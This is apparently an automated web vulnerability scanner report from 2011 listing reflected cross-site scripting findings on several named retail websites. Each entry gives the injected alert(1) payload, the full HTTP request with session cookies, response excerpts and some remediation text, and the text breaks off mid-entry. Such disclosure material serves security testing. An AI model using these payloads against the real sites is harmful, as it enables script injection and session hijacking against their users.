The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46345"><script>alert(1)</script>faae217052f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?46345"><script>alert(1)</script>faae217052f=1 HTTP/1.1 Host: www.abesofmaine.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the group1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62321"><script>alert(1)</script>0622e46f7fa was submitted in the group1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.359. http://www.abesofmaine.com/category.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.abesofmaine.com
Path: /category.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d512f"><script>alert(1)</script>dd7d784137c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.360. https://www.abesofmaine.com/accountMenu.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.abesofmaine.com
Path: /accountMenu.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6973d"><script>alert(1)</script>47a4ff413c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accountMenu.do?6973d"><script>alert(1)</script>47a4ff413c3=1 HTTP/1.1 Host: www.abesofmaine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload ed906<a%20b%3dc>6e337f98fb4 was submitted in the query parameter. This input was echoed as ed906<a b=c>6e337f98fb4 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28630"%3balert(1)//f551f39996d was submitted in the keyword parameter. This input was echoed as 28630";alert(1)//f551f39996d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 115601 Content-Type: text/html;charset=UTF-8 Date: Fri, 30 Sep 2011 12:27:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html > <head> <style type="text/css"> body {
...[SNIP]... page_name_es : "ES_SearchPage", // Espanol name of page viewed customer_id : "", // customer identifier page_language_indicator: language_indicator, // EN or ES
search_term : "notebook, lap28630";alert(1)//f551f39996d", // search term entered by customer search_category : "", // category id
The value of the Page request parameter is copied into the HTML document as plain text between tags. The payload fbed7<script>alert(1)</script>33b2c5913b was submitted in the Page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Merchant2/merchant.mvc?Page=minibasketfbed7<script>alert(1)</script>33b2c5913b&Frame=none&Session_ID= HTTP/1.1 Host: www.flyingmule.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.flyingmule.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:24:39 GMT Server: Apache/2.0.52 (CentOS) Set-Cookie: htscallerid=38af55fb912621295cd4a73301f80043; expires=Sat, 29-Sep-2012 12:24:39 GMT; path=/ P3P: CP="NOI DEVa TAIa OUR BUS UNI STA" Content-Type: text/html; charset=ISO-8859-1 Content-Length: 2028
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bedee'%3balert(1)//e646358c25c72e35d was submitted in the kw parameter. This input was echoed as bedee';alert(1)//e646358c25c72e35d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the origkw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c101'%3balert(1)//26f75d693a9 was submitted in the origkw parameter. This input was echoed as 3c101';alert(1)//26f75d693a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the origkw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1999'%3balert(1)//3a901cb32b6 was submitted in the origkw parameter. This input was echoed as d1999';alert(1)//3a901cb32b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a14"><script>alert(1)</script>4b46dabcdac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /45-years.htmld0a14"><script>alert(1)</script>4b46dabcdac HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=49d29d7798654d54983e8f51dfcbc227; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.11.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:35:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855%2527%2527; path=/ Vary: User-Agent Content-Length: 13703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75904<a>ed6b9a31c65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /45-years.html75904<a>ed6b9a31c65 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=49d29d7798654d54983e8f51dfcbc227; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.11.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:35:58 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855%2527%2527; path=/ Vary: User-Agent Content-Length: 13655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a04b9<a>959a651c2ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.htmla04b9<a>959a651c2ad HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/45-years.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:35:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 12050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9ad6"><script>alert(1)</script>907c9515330 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.htmla9ad6"><script>alert(1)</script>907c9515330 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/45-years.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:04:24 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 12098
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72f0a<a>7a179e9882c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Library-Furniture--20--no.html72f0a<a>7a179e9882c HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/search.php?find-box=xss%20circle%20shoes Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=55d4a97e1e7b407da97f4782754d124e; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.31.9.1317385225447; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:09:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384ae0e1f563e5ffdce; path=/ Vary: User-Agent Content-Length: 11972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8021"><script>alert(1)</script>2b9f91d37bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Library-Furniture--20--no.htmle8021"><script>alert(1)</script>2b9f91d37bc HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/search.php?find-box=xss%20circle%20shoes Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=55d4a97e1e7b407da97f4782754d124e; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.31.9.1317385225447; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:09:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384ae0e1f563e5ffdce; path=/ Vary: User-Agent Content-Length: 12020
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d350"><script>alert(1)</script>78772bb2137 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Outdoor-Directories--38--ca.html2d350"><script>alert(1)</script>78772bb2137 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/church-furniture.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.16.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=f3bdb4878e1749588aef3d1c1087f699; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:39 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 12024
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31dc5<a>67661c6aa7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Outdoor-Directories--38--ca.html31dc5<a>67661c6aa7b HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/church-furniture.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.16.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=f3bdb4878e1749588aef3d1c1087f699; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:36:23 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11976
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43c6e"><script>alert(1)</script>0e4dca14678 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html43c6e"><script>alert(1)</script>0e4dca14678 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=f3bdb4878e1749588aef3d1c1087f699; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.18.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:36:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 12126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21f87<a>785f12cdc0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html21f87<a>785f12cdc0b HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=f3bdb4878e1749588aef3d1c1087f699; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.18.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:36:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 12078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eebbf<a>140c6ba9346 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
